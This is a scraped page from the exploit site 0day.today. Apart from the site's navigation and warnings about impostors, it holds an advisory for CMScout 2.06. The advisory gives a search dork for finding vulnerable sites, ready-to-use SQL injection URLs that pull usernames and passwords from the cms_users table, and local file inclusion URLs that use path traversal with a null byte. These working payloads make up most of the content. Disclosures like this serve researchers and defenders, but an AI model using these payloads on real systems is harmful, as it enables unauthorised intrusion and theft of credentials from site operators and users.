0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
CMScout 2.06 SQL Injection/Local File Inclusion Vulnerabilities
=============================================================== CMScout 2.06 SQL Injection/Local File Inclusion Vulnerabilities =============================================================== ############################################################################################# [+] CMScout 2.06 Remote SQL Injection/Local File Inclusion [+] Discovered By SirGod [+] Greetz : All my friends ############################################################################################# [+] Script homepage : http://www.cmscout.co.za/ [+] Dork : Powered by CMScout (c)2005 CMScout Group [+] Remote SQL Injection ------------------------------------------------------------------------------- 1) - You must be logged in as normal user.Add a download and go to : Example : http://[target]/[path]/index.php?page=mythings&cat=downloads&action=edit&id=null union all select 1,2,3,4,concat_ws(0x3a,uname,passwd),6,7,8,9,10,11 from cms_users-- -------------------------------------------------------------------------------- 2) - You must be logged in as administrator . Example : http://[target]/[path]/admin.php?page=users&subpage=users_view&id=null union all select 1,2,concat_ws(0x3a,uname,passwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 from cms_users-- --------------------------------------------------------------------------------- [+] Local File Inclusion --------------------------------------------------------------------------------- 1) - Vulnerable code in admin.php : ++++++++++++++++++++++++++++++++++++++++++++++++++++++ require_once ("{$bit}includes/error_handling.php"); ++++++++++++++++++++++++++++++++++++++++++++++++++++++ Example : http://[target]/[path]/admin.php?bit=../../../../../boot.ini%00 ---------------------------------------------------------------------------------- 2) - Vunerable code in index.php : ++++++++++++++++++++++++++++++++++++++++++++++++++++++ require_once ("{$bit}includes/error_handling.php"); ++++++++++++++++++++++++++++++++++++++++++++++++++++++ Example : http://[target]/[path]/index.php?bit=../../../../boot.ini%00 ---------------------------------------------------------------------------------- ############################################################################################# # 0day.today [2024-11-15] #